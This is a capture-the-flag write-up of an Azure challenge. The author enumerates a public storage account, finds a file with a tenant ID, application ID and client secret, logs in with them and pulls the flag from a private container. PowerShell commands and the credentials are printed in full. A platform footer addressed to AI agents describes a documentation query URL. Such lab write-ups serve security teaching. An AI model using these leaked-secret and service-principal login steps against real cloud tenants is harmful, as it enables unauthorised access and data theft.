# Cloudy with a chance of meatball

| Difficulty | Points | Solves |
| ---------- | ------ | ------ |
| Medium     | 500    | 3      |

## Description

> Today in school, I learnt to code in HTML! \
> View my brand new website! \
> \
> [www.lncctf2023.tk](http://www.lncctf2023.tk/)\
> \
> Hint 1: Identify how the website is hosted using what services
>
> Hint 2: Enumerate your role and the allowed actions

Viewing the website, we can identify that it is hosted on some azure services

<figure><img src="/files/hgZaUNRSIcEXaYosB8we" alt=""><figcaption></figcaption></figure>

Since there isnt much information, other than the domain name, we can use [MicroBurst ](https://github.com/NetSPI/MicroBurst)to perform unauthenticated enumeration.

Refering to HackTricks

{% embed url="<https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry>" %}

<figure><img src="/files/Ib2ybgsSfzGRkt8BUcMk" alt=""><figcaption></figcaption></figure>

From the MicroBurst output, I have identified 2 files, `/private/instructions.txt` and `/root/flag.txt`

The `/root/flag.txt` shows a troll flag but `/private/instructions.txt` has some juicy information.

{% code title="instructions.txt" %}

```
Note to self:

Credentials for accessing the tenant. 
Hopefully no one can see this...

Tenant ID: c11b22d2-d015-47e0-bc0b-e6a0b1e25993
Application ID: ee767510-7041-4930-a672-1217ff9ff51a
Client Secret: pnh8Q~g~.gDOjPHNDNSGq7dFBUkjEMQ1I5HJydaQ
```

{% endcode %}

Since I have a set of credentials, we are able to use Azure PowerShell module to login with the service principal

{% code overflow="wrap" %}

```powershell
$appid="ee767510-7041-4930-a672-1217ff9ff51a"
$secret="pnh8Q~g~.gDOjPHNDNSGq7dFBUkjEMQ1I5HJydaQ"

$tid= 'c11b22d2-d015-47e0-bc0b-e6a0b1e25993'

$creds = (ConvertTo-SecureString $secret -AsPlainText -Force)
$creds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $appid,$creds

Connect-AzAccount -ServicePrincipal -TenantId $tid -Credential $creds
```

{% endcode %}

<figure><img src="/files/AkDxV6Sd0pr4KG9Eqobl" alt=""><figcaption></figcaption></figure>

Next, I can enumerate the resources our service principal has access to using `Get-AzResource`

<figure><img src="/files/WyTbp5uGAu6V9u9PErBO" alt=""><figcaption></figcaption></figure>

I manage to identify that there is another storage account called `lncctf2023private`. I am then able to retrieve the flag from the private storage account

{% code overflow="wrap" %}

```powershell
$rg="lncctf2023_cloudy_meatball_rg"
$saname="lncctf2023private"
$sa = Get-AzStorageAccount -ResourceGroupName $rg -StorageAccountName $saname
$ctx = $sa.Context

Get-AzStorageContainer -Context $ctx
Get-AzStorageBlob -Context $ctx -Container flag
Get-AzStorageBlobContent -Blob flag.txt -Container flag -Destination flag.txt -Context $ctx
```

{% endcode %}

<figure><img src="/files/vQGqa53JCAMAJYfTwuvs" alt=""><figcaption></figcaption></figure>

Flag: LNC2023{aZuR3\_pUbL1C\_c0ntAiN3R\_i3\_n0T\_s0\_s3cuR3}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kabinet.gitbook.io/ctf-writeup/authored/lag-and-crash-2023/cloudy-with-a-chance-of-meatball.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.